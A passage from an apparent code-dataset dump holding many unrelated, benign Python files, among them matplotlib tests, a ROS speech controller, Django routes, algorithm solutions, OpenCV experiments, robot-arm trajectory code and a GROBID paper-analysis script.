4, 16, 'test4', size=20, rotation=90.0,\n        ha='center', va='center', color='b', weight='heavy',\n        bbox=dict(\n            
boxstyle='larrow',\n            ls='dotted',\n            ec=(1., 0.5, 0.5),\n            fc=(1., 0.8, 0.8),\n        )\n    )\n    plt.text(\n        2, 18, 'test5', size=20,\n        ha='center', va='center', color='b',\n        bbox=dict(\n            boxstyle='darrow',\n            ec=(1., 0.5, 0.5),\n            fc=(1., 0.8, 0.8),\n        )\n    )\n    plt.text(\n        1, 20, 'test6', size=20,\n        ha='center', va='center', color='b',\n        bbox=dict(\n            boxstyle='circle',\n            ec=(1., 0.5, 0.5),\n            fc=(1., 0.8, 0.8),\n        )\n    )\n    plt.text(\n        3, 23, 'test7', size=20,\n        ha='center', va='center', color='b',\n        bbox=dict(\n            boxstyle='roundtooth',\n            ec=(1., 0.5, 0.5),\n            fc=(1., 0.8, 0.8),\n        )\n    )\n    plt.text(\n        3, 20, 'test8', size=20,\n        ha='center', va='center', color='b',\n        bbox=dict(\n            boxstyle='sawtooth',\n            ec=(1., 0.5, 0.5),\n            fc=(1., 0.8, 0.8),\n        )\n    )\n    plt.plot(xxx, yyy, label='a graph')\n    plt.legend()\n\n    return fig\n\n\ndef test():\n    phash = helpers.Phash(plot())\n    assert phash.phash == '370da93449d3f64c', phash.get_details()\n    return\n\n\nif __name__ == '__main__':\n    plot()\n    plt.show()\n    # phash, _, _, _, _, _, _ = helpers.compute_phash(plot2())\n    # print(phash)\n","sub_path":"test/test_text_overlay.py","file_name":"test_text_overlay.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"607121917","text":"#!/usr/bin/python\n\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom std_msgs.msg import String\nfrom sound_play.libsoundplay import SoundClient\nfrom CorpusGenerator import CorpusGenerator\n\nclass ASRController():\n\n    def __init__(self, corpGen):\n        rospy.init_node('asr_controller')\n        self.corpGen = corpGen\n        self.soundhandle = SoundClient()\n        rospy.sleep(1)\n        self.voice = 'voice_don_diphone'\n        self.volume = 1.0\n\n        rospy.Subscriber('/grammar_data', String, self.parse_speech)\n        rospy.spin()\n\n    def parse_speech(self, speech_data):\n        if speech_data.data.strip() in self.corpGen.listQuestions():\n            answer = self.corpGen.getAnswer(speech_data.data.strip())\n            rospy.loginfo('[SYNTHESIS] Matched Question')\n            self.say(answer, voice=self.voice)\n\n    def say(self, speech, voice=''):\n        self.soundhandle.say(speech, voice)\n\nif __name__ == \"__main__\":\n    namesFile = rospy.get_param(\"/asr_controller/namesFile\")\n    objectsFile = rospy.get_param(\"/asr_controller/objectsFile\")\n    locationsFile = rospy.get_param(\"/asr_controller/locationsFile\")\n    gesturesFile = rospy.get_param(\"/asr_controller/gesturesFile\")\n    questionsFile = rospy.get_param(\"/asr_controller/questionsFile\")\n    \n    corpGen = CorpusGenerator()\n    corpGen.loadFiles(namesFile, objectsFile, locationsFile, gesturesFile, questionsFile)\n    ASRController(corpGen)","sub_path":"ros_test/src/robocup_asr.py","file_name":"robocup_asr.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"107724649","text":"from html.parser import HTMLParser\n\nfrom urllib.request import urlopen, Request\n\nclass myParser (HTMLParser):\n    def __init__(self):\n        HTMLParser.__init__(self)\n        self.n_polos = 0\n\n    def handle_starttag(self, tag, attrs):\n        if tag == 'p':\n            for attr in attrs:\n                if attr[0] == 'class' and attr[1] == 'item-polos':\n                    self.n_polos +=1\n\n    def num_polos (self):\n        return self.n_polos\n\ndef getSource(url):\n    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (khtml, like Gecko) Chrome/41.0.2228.0 Safari/537.3'}\n    reg_url = \"https:xxxx0000\"\n    req = Request (url = url, headers=headers)\n    html = urlopen (req).read()\n    return html.decode()\n\nhtml = getSource 
('https://univesp.br/cursos/engenharia-de-computacao') \nparser = myParser()\nparser.feed(html)\nprint(parser.num_polos())\n\n","sub_path":"busca_polos.py","file_name":"busca_polos.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"65352015","text":"from django import http\nfrom django.conf.urls import url\n\nfrom . import views\n\n\nurlpatterns = [\n    url(r\"^$\", views.plog_index, name=\"plog_index\"),\n    url(r\"^calendar/$\", views.calendar, name=\"calendar\"),\n    url(r\"^calendar/data/$\", views.calendar_data, name=\"calendar_data\"),\n    url(r\"^new-comments$\", views.new_comments, name=\"new_comments\"),\n    url(r\"^prepare.json$\", views.prepare_json, name=\"prepare\"),\n    url(r\"^preview.json$\", views.preview_json, name=\"preview\"),\n    url(r\"^hits$\", views.plog_hits, name=\"plog_hits\"),\n    url(r\"^hits/data$\", views.plog_hits_data, name=\"plog_hits_data\"),\n    url(r\"^(.*)/submit$\", views.submit_json, name=\"submit\"),\n    url(\n        \"^(.*)/all-comments$\",\n        views.all_blog_post_comments,\n        name=\"all_plog_post_comments\",\n    ),\n    url(r\"^screenshot/(.*)\", views.blog_screenshot, name=\"blog_screenshot\"),\n    url(\n        r\"^(?P<oid>.*)/p(?P<page>\\d+)/ping$\",\n        views.blog_post_ping,\n        name=\"blog_post_ping\",\n    ),\n    url(r\"^(?P<oid>.*)/ping$\", views.blog_post_ping, name=\"blog_post_ping\"),\n    url(\n        r\"^(?P<oid>.*)/p(?P<page>\\d+)/awspa$\",\n        views.blog_post_awspa,\n        name=\"blog_post_awspa\",\n    ),\n    url(r\"^(?P<oid>.*)/awspa$\", views.blog_post_awspa, name=\"blog_post_awspa\"),\n    url(\n        r\"^(?P<oid>.*)/p(?P<page>\\d+)/$\",\n        lambda r, oid, page: http.HttpResponseRedirect(\"/{}/p{}\".format(oid, page)),\n    ),\n    url(r\"^(?P<oid>.*)/p(?P<page>\\d+)$\", views.blog_post, name=\"blog_post\"),\n    url(r\"^(?P<oid>.*)\", views.blog_post, name=\"blog_post\"),\n]\n","sub_path":"peterbecom/plog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"378564960","text":"from notbot.context import Context, Module\nfrom discord.ext import commands\nfrom typing import Union\nfrom discord import Member\nfrom .util import create_embed\n\nMODULE_NAME = \"personal_commands_module\"\n\n\nclass PersonalCommandsModule(commands.Cog, Module):\n    def __init__(self, context: Context):\n        self.bot = context.get_bot()\n        self.kira = 441525718065872906\n\n    def get_name(self):\n        return MODULE_NAME\n\n    @commands.command(name=\"judgement\", aliases=[\"judge\"])\n    async def _judge(self, ctx, user: Union[Member]):\n        if not ctx.author.id == self.kira:\n            raise commands.BadArgument(\n                \"You do not have the power to write the death note.\"\n            )\n        if not user:\n            raise commands.BadArgument(\"You must write a name in the death note.\")\n        embed = create_embed(self.bot)\n        embed.description = (\n            f\"I am the god of the new world! 
{user} is now written in the death note.\"\n )\n embed.set_image(\n url=\"https://cdn.discordapp.com/attachments/478869899499012096/596230452071890964/writesinnote.gif\"\n )\n await ctx.send(embed=embed)\n\n\ndef setup(bot):\n context: Context = bot.context\n\n info_module = context.get_module(MODULE_NAME)\n bot.add_cog(info_module)\n","sub_path":"notbot/cogs/personal_commands.py","file_name":"personal_commands.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"466182182","text":"import numpy as np\nimport pandas\n\ndata = pandas.read_csv(\"2018_Central_Park_Squirrel_Census_-_Squirrel_Data.csv\")\n\ncolor_set = set(data['Primary Fur Color'])\ncolor_set.remove(np.nan)\ncolor_dict = {\"Fur Color\": [], \"Count\": []}\nfor color in color_set:\n fur_color_group = data.groupby(data[\"Primary Fur Color\"] == color).count()[\"Primary Fur Color\"]\n color_dict[\"Fur Color\"].append(color)\n color_dict[\"Count\"].append(fur_color_group.loc[True])\n\nprint(color_dict)\npd_data = pandas.DataFrame(color_dict)\nprint(pd_data)\n\npd_data.to_csv('squirrel_count.csv')\n\n\n\n","sub_path":"pandas-intro/squirrel.py","file_name":"squirrel.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"448032781","text":"STEP = 394\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n def insert_after(self, value):\n x = Node(value)\n x.next = self.next\n self.next = x\n def __iter__(self):\n cur = self\n while cur is not None:\n yield cur.value\n cur = cur.next\n \ndef value_after(iterable, target):\n g = iter(iterable)\n for x in g:\n if x == target:\n break\n return next(g)\n\ndef create_buffer(step, rounds):\n start = cur = Node(0)\n cur.next = cur\n for i in range(1, rounds+1):\n for _ in range(step):\n cur = cur.next\n cur.insert_after(i)\n cur = cur.next\n return start\n\ndef number_following_zero(step, rounds):\n #two observations:\n #1. We can easily keep track of zero's index, and the state of the \n # index following it, without having to keep track of the value at any\n # other index. So we have O(1) memory consumption.\n #2. When the buffer has a size of at least `k*step` where k >= 2, \n # we can skip at least k-1 intermediate insertions, which can provide\n # substantial performance increases compared to the conventional approach,\n # when `rounds` is much larger than `step`. \n # Which it happens to be for part 2 :-)\n idx = 0\n x = None\n size = 1\n while size < rounds+1:\n insertions_this_loop = (size - idx) // step\n \n if idx == 0:\n x = size\n if insertions_this_loop > 0:\n size += insertions_this_loop\n idx = (idx + (step+1)*insertions_this_loop) % size\n else:\n size += 1\n idx = (idx + step + 1)% (size)\n return x\n\n#part 1\nbuf = create_buffer(STEP, 2017)\nprint(value_after(buf, 2017))\n\n#part 2\nprint(number_following_zero(STEP, 50000000))\n","sub_path":"day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"412606664","text":"# 1. 
Brute force\n# For each bar, find its left bound and right bound, where a bound is the tallest bar on that side that is taller than the current bar\n# trapped water = max(min(leftBound, rightBound) - current, 0)\n# [0] = min(0, 1) - 0 = 0\n# [1] = min(0, 2) - 1 = 0\n# [2] = min(1, 2) - 0 = 1\n# [3] = min(0, 3) - 2 = 0\n# [4] = min(2, 3) - 1 = 1\n# [5] = min(2, 3) - 0 = 2\n# [6] = min(2, 3) - 1 = 1\n# [7] = min(0, 0) - 3 = 0\n# [8] = min(3, 2) - 2 = 0\n# [9] = min(2, 2) - 1 = 1\n# [10] = min(3, 0) - 2 = 0\n# [11] = min(2, 0) - 1 = 0\n# \n# 2. Dynamic programming\n# Precompute and store the left/right bounds first, then compute the trapped water in one final pass\n# Use dynamic programming when storing the left/right bounds:\n# Left[i] = max(Left[i-1], height[i-1])\n# Right[i] = max(Right[i+1], height[i+1])\n# 3. Stack\n# \n# 4. Two pointers\n# \n# \nclass Solution:\n    def trap(self, height: List[int]) -> int:\n        # 1. Brute force\n        # size = len(height)\n        # total = 0\n        # for i in range(1, size-1):\n        #     leftBound = 0\n        #     rightBound = 0\n        #     for j in range(i-1, -1, -1):\n        #         if height[i] < height[j] and leftBound < height[j]:\n        #             leftBound = height[j]\n        #     for j in range(i+1, size):\n        #         if height[i] < height[j] and rightBound < height[j]:\n        #             rightBound = height[j]\n        #     area = min(leftBound, rightBound) - height[i]\n        #     area = max(area, 0)\n        #     total += area\n        # return total\n\n        # 2. Dynamic programming\n        # total = 0\n        # size = len(height)\n        # left = [0]*size\n        # right = [0]*size\n        # for i in range(1, size):\n        #     left[i] = max(left[i-1], height[i-1])\n        # for i in range(size-2, -1, -1):\n        #     right[i] = max(right[i+1], height[i+1])\n        # for i in range(size):\n        #     area = max(min(left[i], right[i]) - height[i], 0)\n        #     total += area\n        # return total\n\n        # 3. Stack\n        # total = 0\n        # size = len(height)\n        # if size <= 2:\n        #     return 0\n        # stack = []\n        # stack.append(0)\n        # stack.append(1)\n        # for i in range(2, size):\n        #     while stack and height[i] > height[stack[-1]]:\n        #         # water is trapped here, compute it\n        #         curr = stack.pop()\n        #         if stack:\n        #             heigh = min(height[stack[-1]], height[i]) - height[curr]\n        #             width = i - stack[-1] - 1\n        #             area = heigh * width\n        #             total += max(area, 0)\n        #     stack.append(i)\n        # return total\n\n        # 4. Two pointers\n        total = 0\n        left = 0\n        right = len(height) - 1\n        leftBound = rightBound = 0\n        while left <= right:\n            leftBound = max(leftBound, height[left])\n            rightBound = max(rightBound, height[right])\n            if leftBound <= rightBound:\n                total += leftBound - height[left]\n                left +=1 \n            else:\n                total += rightBound - height[right]\n                right -= 1\n        return total","sub_path":"Week_02/G20200389010044/LeetCode_42_0044.py","file_name":"LeetCode_42_0044.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"400790030","text":"import cv2\nimport numpy as np\n\nimages = [\n    cv2.imread('/Users/jhaip/Code/lovelace/src/standalone_processes/files/cv_tiles/up.png',0),\n    cv2.imread('/Users/jhaip/Code/lovelace/src/standalone_processes/files/cv_tiles/down.png',0),\n    cv2.imread('/Users/jhaip/Code/lovelace/src/standalone_processes/files/cv_tiles/right.png',0),\n    cv2.imread('/Users/jhaip/Code/lovelace/src/standalone_processes/files/cv_tiles/left.png',0),\n    cv2.imread('/Users/jhaip/Code/lovelace/src/standalone_processes/files/cv_tiles/loopstart.png',0),\n    cv2.imread('/Users/jhaip/Code/lovelace/src/standalone_processes/files/cv_tiles/loopstop.png',0),\n]\n\ndef draw_style1():\n    modimages = cv2.hconcat(images)\n    cv2.imshow('style1', modimages)\n\ndef draw_style2():\n    kernel = np.ones((5,5),np.uint8)\n    modimages = []\n    for m in images:\n        t = cv2.erode(m,kernel,iterations=4)\n        modimages.append(t)\n    combined = cv2.hconcat(modimages)\n    cv2.imshow('style2', combined)\n\ndef draw_style3():\n    kernel = np.ones((3,3),np.uint8)\n    modimages = []\n    for m in images:\n        t = cv2.erode(m,kernel,iterations=6)\n        modimages.append(t)\n    combined = cv2.hconcat(modimages)\n    cv2.imshow('style3', combined)\n\ndef draw_style4():\n    modimages = []\n    for m in images:\n        cdst = cv2.cvtColor(m, cv2.COLOR_GRAY2BGR)\n        edges = cv2.Canny(m,50,150,apertureSize = 3)\n        lines = cv2.HoughLines(edges,1,np.pi/180,25)\n        if lines is not None:\n            for line in lines:\n                for rho,theta in line:\n                    a = np.cos(theta)\n                    b = np.sin(theta)\n                    x0 = a*rho\n                    y0 = b*rho\n                    x1 = int(x0 + 1000*(-b))\n                    y1 = int(y0 + 1000*(a))\n                    x2 = int(x0 - 1000*(-b))\n                    y2 = int(y0 - 1000*(a))\n\n                    cv2.line(cdst,(x1,y1),(x2,y2),(0,0,255),2)\n        modimages.append(cdst)\n    combined = cv2.hconcat(modimages)\n    cv2.imshow('lines', combined)\n\ndef draw_style5():\n    modimages = []\n    for m in images:\n        size = np.size(m)\n        skel = np.zeros(m.shape,np.uint8)\n        element = cv2.getStructuringElement(cv2.MORPH_CROSS,(3,3))\n        done = False\n        while(not done):\n            eroded = cv2.erode(m,element)\n            temp = cv2.dilate(eroded,element)\n            temp = cv2.subtract(m,temp)\n            skel = cv2.bitwise_or(skel,temp)\n            m = eroded.copy()\n\n            zeros = size - cv2.countNonZero(m)\n            if zeros==size:\n                done = True\n        modimages.append(skel)\n    combined = cv2.hconcat(modimages)\n    cv2.imshow('skel', combined)\n\ndef draw_contours():\n    kernel = np.ones((7,7),np.uint8)\n    modimages = []\n    modimages2 = []\n    for m in images:\n        cdst = cv2.cvtColor(m, cv2.COLOR_GRAY2BGR)\n        dilation = cv2.dilate(m,kernel,iterations = 1)\n        image, contours, hierarchy = cv2.findContours(dilation,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE) \n        biggest_contours = sorted(contours, key = cv2.contourArea, reverse = True)[:1] # get largest contour\n        # cdst = cv2.drawContours(cdst, contours, -1, (0,255,0), 3)\n        cdst = cv2.drawContours(cdst, biggest_contours, -1, (0,255,0), 3)\n        modimages.append(cdst)\n        c = biggest_contours[0]\n        # determine the most extreme points along the contour\n        extLeft = tuple(c[c[:, :, 
0].argmin()][0])\n extRight = tuple(c[c[:, :, 0].argmax()][0])\n extTop = tuple(c[c[:, :, 1].argmin()][0])\n extBot = tuple(c[c[:, :, 1].argmax()][0])\n cv2.rectangle(cdst,(extLeft[0],extTop[1]),(extRight[0],extBot[1]),(0,255,0),1)\n\n closing = cv2.morphologyEx(m, cv2.MORPH_CLOSE, kernel)\n erosion = cv2.erode(closing,kernel,iterations = 1)\n dilation_copy = m.copy()\n cropped = dilation_copy[extTop[1]:extBot[1], extLeft[0]:extRight[0]]\n dim = (40, 40)\n resized = cv2.resize(cropped, dim, interpolation = cv2.INTER_NEAREST)\n modimages2.append(resized)\n\n combined = cv2.hconcat(modimages)\n cv2.imshow('contours', combined)\n combined2 = cv2.hconcat(modimages2)\n cv2.imshow('contours_cropped', combined2)\n\n\n# cv2.imshow('image',img)\n# cv2.imshow('image1', erosion1)\n# cv2.imshow('image2',erosion10)\n# cv2.imshow('image3', erosion3)\n# cv2.imshow('erosion11', erosion11)\ndraw_style1()\ndraw_style2()\ndraw_style3()\ndraw_style4()\ndraw_style5()\ndraw_contours()\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"erode.py","file_name":"erode.py","file_ext":"py","file_size_in_byte":4480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"157516386","text":"import matplotlib.pyplot as plt\nfrom datetime import datetime, timedelta\nimport csv\nimport sys\n\nPATH = '../csv/vehicles.csv'\nHOURS = 24\nday = 24\nmonth = 8\nstart_date = datetime(2019, month, day)\nend_date = start_date + timedelta(days=1)\n\ntraffic = [0] * HOURS\ntraffic_left = [0] * HOURS\ntraffic_right = [0] * HOURS\nabs_traffic = 0\navg_traffic_hour = 0\ntext_traffic = \"\"\n\navg_speed_hour = [0] * HOURS\navg_speed = 0\nmax_speed = 0\ntext_speed = \"\"\n\nfig = None\n\n\ndef main():\n global fig\n fig, ax1 = plt.subplots()\n ax2 = ax1.twinx()\n ax1.grid()\n\n plt.title(\"TRAFFIC VOLUME\\n\" + start_date.strftime(\"%d. 
%b %Y (%a)\"))\n # plt.tight_layout()\n\n ax1.set_xlabel('Hours')\n x_axis = [i for i in range(HOURS)]\n hours = []\n for i in range(HOURS):\n if i % 2 == 0:\n hour = (start_date + timedelta(hours=i)).strftime(\"%H:%M\")\n hours.append(hour)\n else:\n hours.append(\"\")\n plt.xticks(x_axis, hours)\n plt.gcf().autofmt_xdate()\n\n get_vehicles()\n\n set_text()\n plt.gcf().text(0.12, 0.9, text_traffic, fontweight=\"bold\")\n plt.gcf().text(0.24, 0.9, text_speed, fontweight=\"bold\")\n\n ax1.set_ylabel('Vehicles')\n ax1.set_yticks([i for i in range(600) if i % 50 == 0])\n\n line1, = ax1.plot(x_axis, traffic)\n line2, = ax1.plot(x_axis, [avg_traffic_hour] * HOURS, linestyle=\"--\", color=\"orange\")\n line3, = ax1.plot(x_axis, traffic_left, linestyle=\":\", color=\"green\")\n line4, = ax1.plot(x_axis, traffic_right, linestyle=\"-.\", color=\"red\")\n\n ax2.set_ylabel('Speed (km/h)')\n line5, = ax2.plot(x_axis, avg_speed_hour, linestyle=\":\", color=\"magenta\")\n ax2.set_yticks([i for i in range(100) if i % 10 == 0])\n\n plt.legend((line1, line2, line3, line4, line5), ('absolute', 'average', 'dir left (k)', 'dir right (w)', 'speed'))\n plt.show()\n\n\ndef get_vehicles():\n global traffic, traffic_left, traffic_right, avg_traffic_hour, avg_speed_hour, abs_traffic, avg_speed, max_speed\n speeds = [0] * HOURS\n speeds_traffic = [0] * HOURS\n max_speeds = [0] * 100\n with open(PATH) as file:\n csv_reader = csv.DictReader(file)\n for vehicle in csv_reader:\n timestamp = float(vehicle['first_seen'])\n date = datetime.fromtimestamp(timestamp)\n if date < start_date:\n continue\n elif date < end_date:\n hour = date.hour\n traffic[hour] += 1\n if vehicle['dir'] == 'left':\n traffic_left[hour] += 1\n else:\n traffic_right[hour] += 1\n try:\n vehicle_speed = float(vehicle['speed'])\n if 40 < vehicle_speed < 200:\n speeds[hour] += vehicle_speed\n speeds_traffic[hour] += 1\n min_speed = min(max_speeds)\n if min_speed < vehicle_speed < 200:\n for i in range(len(max_speeds)):\n if max_speeds[i] == min_speed:\n max_speeds[i] = vehicle_speed\n break\n except ValueError:\n continue\n elif date >= end_date:\n break\n abs_traffic = sum(traffic)\n avg_traffic_hour = int(abs_traffic / HOURS)\n sum_speeds_traffic = sum(speeds_traffic)\n if sum_speeds_traffic != 0:\n avg_speed_hour = list(map(lambda s, t: round(s / t, 2) if t > 3 else None, speeds, speeds_traffic))\n avg_speed = round(sum(speeds) / sum_speeds_traffic, 2)\n max_speed = round(sum(max_speeds) / len(max_speeds), 2)\n\n\ndef set_text():\n global text_traffic, text_speed\n if abs_traffic != 0:\n abs_traffic_left = sum(traffic_left)\n abs_traffic_right = sum(traffic_right)\n text_traffic = \"Vehicles total: \" + \"{:,}\".format(abs_traffic) \\\n + \"\\nLeft/right: \" + \"{:,}\".format(abs_traffic_left) + \"/{:,}\".format(abs_traffic_right) \\\n + \"\\nVehicles per hour: \" + \"{:,}\".format(avg_traffic_hour)\n text_speed = \"Speed avg: \" + \"{:,}\".format(avg_speed) + \" km/h\" \\\n + \"\\nSpeed max: \" + \"{:,}\".format(max_speed) + \" km/h\"\n\n\ndef set_dates():\n global day, month, start_date, end_date\n if len(sys.argv) == 2:\n day = int(sys.argv[1])\n elif len(sys.argv) == 3:\n day = int(sys.argv[1])\n month = int(sys.argv[2])\n start_date = datetime(2019, month, day)\n end_date = start_date + timedelta(days=1)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n set_dates()\n 
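    # Assumed usage, matching set_dates() above: python vehicle_plotter_day.py [day] [month]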
main()\n","sub_path":"plotters/vehicle_plotter_day.py","file_name":"vehicle_plotter_day.py","file_ext":"py","file_size_in_byte":4627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"221014658","text":"import numpy as np\nfrom . import kin\nimport plotly.graph_objs as go\n\n# create the matrix to plot the robot arm\ndef calctrajectorymat(thetamat, robobj):\n\n i = 0\n nopoints = len(thetamat)\n trajectorymat = np.zeros((nopoints, robobj.jointno + 1, 3))\n\n while i < nopoints:\n trajectorymat[i] = kin.fwd(robobj, thetamat[i])\n i = i + 1\n\n return trajectorymat\n\n\n# create list of joint angles from initial to final position of the robot\ndef calctrac(robobj, thetainit, thetafinal, nopoints):\n\n thetamat = np.zeros((nopoints + 2, robobj.jointno))\n thetamat[0] = thetainit\n\n i = 1\n while i < nopoints + 2:\n j = 0\n while j < robobj.jointno:\n thetamat[i][j] = thetainit[j] + i*thetafinal[j]/(nopoints+1)\n j = j + 1\n i = i + 1\n\n return calctrajectorymat(thetamat, robobj)\n\n\ndef linetrac(robobj, pt1, pt2):\n x = np.linspace(pt1[0], pt2[0])\n y = np.linspace(pt1[1], pt2[1])\n z = np.linspace(pt1[2], pt2[2])\n\n i = 0\n thetamat = np.zeros((len(x), 3))\n\n while i < len(x):\n thetamat[i] = kin.inv(robobj, [x[i], y[i], z[i]])\n i = i + 1\n\n return calctrajectorymat(thetamat, robobj)\n\n\ndef viapts(robobj,mat):\n\n x_arr = []\n y_arr = []\n z_arr = []\n\n i = 0\n while i < len(mat):\n if(i == 0):\n start = mat[i]\n i = i + 1\n else:\n end = mat[i]\n x = np.linspace(start[0], end[0], 10)\n y = np.linspace(start[1], end[1], 10)\n z = np.linspace(start[2], end[2], 10)\n start = mat[i]\n i = i + 1\n x_arr = np.append(x_arr, x)\n y_arr = np.append(y_arr, y)\n z_arr = np.append(z_arr, z)\n\n i = 0\n thetamat = np.zeros((len(x_arr), 3))\n\n while i < len(x_arr):\n thetamat[i] = kin.inv(robobj, [x_arr[i], y_arr[i], z_arr[i]])\n i = i + 1\n\n return calctrajectorymat(thetamat, robobj)\n\n\n# Making the trajectory in 3D in plotly from the trajectory matrix\ndef trajectory_end(robobj, trajectorymat):\n\n nopoints = len(trajectorymat)\n\n x_array = np.zeros(nopoints)\n y_array = np.zeros(nopoints)\n z_array = np.zeros(nopoints)\n\n i = 0\n while i < nopoints:\n x_array[i] = trajectorymat[i][robobj.jointno][0]\n y_array[i] = trajectorymat[i][robobj.jointno][1]\n z_array[i] = trajectorymat[i][robobj.jointno][2]\n i = i + 1\n\n trac = go.Scatter3d(\n x=x_array, y=y_array, z=z_array,\n marker=dict(\n size=5,\n ),\n line=dict(\n color='#ff7f0e',\n width=2\n )\n )\n\n data = [trac]\n\n return data\n\n\n# Making the trajectory for joints in 3D in plotly from the trajectory matrix\ndef trajectory_joints(robobj, trajectorymat):\n\n nopoints = len(trajectorymat)\n\n x_array = np.zeros(nopoints)\n y_array = np.zeros(nopoints)\n z_array = np.zeros(nopoints)\n\n i = 0\n while i < nopoints:\n x_array[i] = trajectorymat[i][robobj.jointno - 1][0]\n y_array[i] = trajectorymat[i][robobj.jointno - 1][1]\n z_array[i] = trajectorymat[i][robobj.jointno - 1][2]\n i = i + 1\n\n trac = go.Scatter3d(\n x=x_array, y=y_array, z=z_array,\n marker=dict(\n size=5,\n ),\n line=dict(\n color='#ff7f0e',\n width=2\n )\n )\n\n data = [trac]\n\n return data\n\n\n","sub_path":"build/lib/kineticspy/trajectory.py","file_name":"trajectory.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"7573813","text":"class Solution:\n def largestRectangleArea(self, heights) -> int:\n heights = [0] 
+ heights + [0]\n        stack = [0]\n        ans = 0\n        for i in range(len(heights)):\n            while stack and heights[i] < heights[stack[-1]]:\n                ans = max(ans, heights[stack.pop()] * (i - stack[-1]-1))\n            stack.append(i)\n        return ans\n\n\nprint(Solution().largestRectangleArea([2, 1, 2]))\n","sub_path":"84.py","file_name":"84.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"35999334","text":"from bs4 import BeautifulSoup\nimport matplotlib.pyplot as plt\nimport re\nimport os\n\n\ndef get_keywords(soup):\n    keywords = soup.find('keywords')\n    if keywords is not None:\n        return \"<h2>Keywords:</h2>\" + keywords.text + \"<br>\"\n    else:\n        return \"<h2>Keywords:</h2>No Keywords found.<br>\"\n\ndef get_figures(soup):\n    figures = soup.find_all('figure')\n    if figures is not None:\n        return len(figures)\n    else:\n        return 0\n    \n\ndef get_links(soup):\n    ptrs = soup.find_all(\"ptr\")\n\n    links = []\n    for ptr in ptrs:\n        links.append(ptr[\"target\"])\n\n    link_pattern = re.compile(r\"(?:(?:https?://|www\\.)\\S+|\\(https?://\\S+\\))\")\n    paragraphs = soup.find_all(\"p\")\n    for p in paragraphs:\n        link_paragraphs = link_pattern.findall(p.text)\n        for link in link_paragraphs:\n            links.append(link)\n    res = \"\"\n    if len(links) != 0:\n        res += \"<h2>Links found (\" + str(len(links)) + \"):</h2>\"\n    else:\n        res = \"<p>No links found.</p>\"\n    return res\n\nif __name__ == \"__main__\":\n\n    def check_structure():\n        if not os.path.exists(\"./input\"):\n            print(\"Input directory does not exist.\")\n            return False\n        if not os.path.exists(\"./output\"):\n            print(\"Output directory does not exist.\")\n            return False\n        print(\"Directory structure is OK.\")\n        return True\n\n    def check_output():\n        if not os.path.exists(\"input/analysis.html\"):\n            print(\"analysis.html file was not created.\")\n            return False\n        if not os.path.exists(\"input/figures_histogram.png\"):\n            print(\"figures_histogram.png file was not created.\")\n            return False\n        print(\"analysis.html file created on the input/ directory.\")\n        return True\n\n\n    if check_structure():\n        # This code will not be used if this module is imported; this is because of the tests, because they fail with the grobid client.\n        from grobid_client.grobid_client import GrobidClient\n\n        client = GrobidClient(config_path=\"config.json\")\n        client.process(\"processFulltextDocument\", \"/input\", output=\"/output\", consolidate_citations=True, tei_coordinates=True, force=True)\n\n\n        output_path = '/output/'\n        output_file = 'input/analysis.html'\n        output_file_figure = 'input/figures_histogram.png'\n\n        if os.path.exists(output_file):\n            os.remove(output_file)\n\n        if os.path.exists(output_file_figure):\n            os.remove(output_file_figure)\n\n        num_figures = [] # list to store the number of figures for each file\n        file_names = [] # list to store the name of each file\n\n        with open(output_file, 'w') as file:\n            for root, dirs, files in os.walk(output_path):\n                for file_name in files + dirs:\n                    \n                    file_path = os.path.join(root, file_name)\n\n                    with open(file_path, 'r', encoding=\"utf-8\") as tei:\n                        soup = BeautifulSoup(tei, 'xml')\n                        file_display = str(file_path).removeprefix(\"/output/\").removesuffix(\".tei.xml\")\n                        file.write(\"<h1>For file: \" + file_display + \"</h1>\")\n                        \n                        file.write(get_keywords(soup))\n                        num_figures.append(get_figures(soup))\n                        file_names.append(file_display)\n                        file.write(get_links(soup))\n\n                    file.write(\"<hr>\")\n\n            plt.figure()\n            plt.bar(file_names,num_figures, align='center') \n            plt.xlabel('File names')\n            plt.ylabel('Number of figures')\n            plt.xticks(rotation=90)\n            plt.savefig('input/figures_histogram.png')\n\n            file.write(\"<h2>Number of Figures Histogram:</h2>\")\n            file.write(\"<img src='figures_histogram.png'>\")\n        check_output()","sub_path":"practica_1/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"614721276","text":"annee = float(input(\"Enter a year\"))\r\nannee = int(annee)\r\nresult = \"false\"\r\n\r\nif annee % 400 == 0 or (annee % 4 == 0 